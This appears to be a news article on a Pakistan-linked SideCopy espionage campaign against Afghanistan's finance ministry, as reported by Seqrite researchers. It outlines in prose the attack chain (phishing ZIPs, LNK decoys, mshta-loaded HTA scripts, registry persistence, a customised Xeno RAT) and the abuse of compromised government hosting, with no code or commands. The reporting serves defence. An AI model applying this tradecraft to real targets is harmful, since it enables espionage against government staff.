An advanced persistent threat (APT) group linked to Pakistan has been conducting unauthorized monitoring of Afghanistan's government finance infrastructure. The campaign targets personnel ranging from the Ministry of Finance down to provincial government employees.
Despite assumptions about the region, Afghanistan maintains a substantial digital footprint. Researchers from Seqrite observed that the government operates interconnected ministry portals, educational institutions, regulatory bodies, and administrative services. Securing this interconnected ecosystem requires defending against modern, widespread cybersecurity threats.
Since at least May 2025, a threat actor known as SideCopy has targeted the Afghan government's finance department. SideCopy operates under the broader Transparent Tribe (APT 36) umbrella, a group frequently associated with the Pakistani government and known for targeting neighboring regions.
Execution sequence and methodology
The methodology observed in this campaign relies on established techniques. The sequence begins with spear-phishing emails containing ZIP archives. These archives house malicious LNK files disguised as PDFs. When opened, the LNK files use the legitimate mshta utility to retrieve a remote HTA script, which is then decoded in memory. Following a series of loaders, the threat actor establishes persistence through the Windows registry, masking the unauthorized task as a Microsoft Edge process.
The final software deployed in this sequence is Xeno RAT, an open-source remote stealer. In this instance, the threat actor customized the tool with a hardcoded command-and-control (C2) domain utilizing bulletproof hosting in Bulgaria.
The threat actors tailored their approach specifically for the affected personnel. The LNK file and the subsequent decoy document were written in Pashto, the native language of Afghanistan's largest ethnic group. The decoy presented a realistic Afghan Ministry of Finance staff directory, complete with names and mobile numbers for high-ranking officials across the country's 34 provinces.
Infrastructure blending and operational security
A notable element of this campaign is how the threat actor blended their unauthorized traffic with legitimate state activity. The remote script was hosted on a compromised domain within the IP address space of Afghanistan's Ministry of Communication and Information Technology.
By routing their traffic through sovereign government infrastructure—alongside more than 200 legitimate education and state websites—the group demonstrated a deliberate approach to defense evasion. Seqrite researchers note that while the operation does not introduce new malware techniques, its sophisticated execution and targeting show a mature approach to operational security.
Cybersecurity resilience in a transitioning infrastructure
Following the governmental transition in 2021, the current administration inherited a network of mobile, fiber optic, and telecommunications infrastructure initially developed through foreign aid and investment over two decades. This included administrative networks like those used by the Finance Ministry, biometric databases, and various security and surveillance systems.
Protecting this inherited digital environment presents substantial challenges. Seqrite researchers identify economic isolation, limited access to international cybersecurity partnerships, and difficulties retaining skilled personnel as factors constraining the country's technology modernization. These environmental constraints limit the ability to monitor and patch systems effectively, creating conditions where threat actors can establish long-term access and conduct espionage with a lower probability of detection.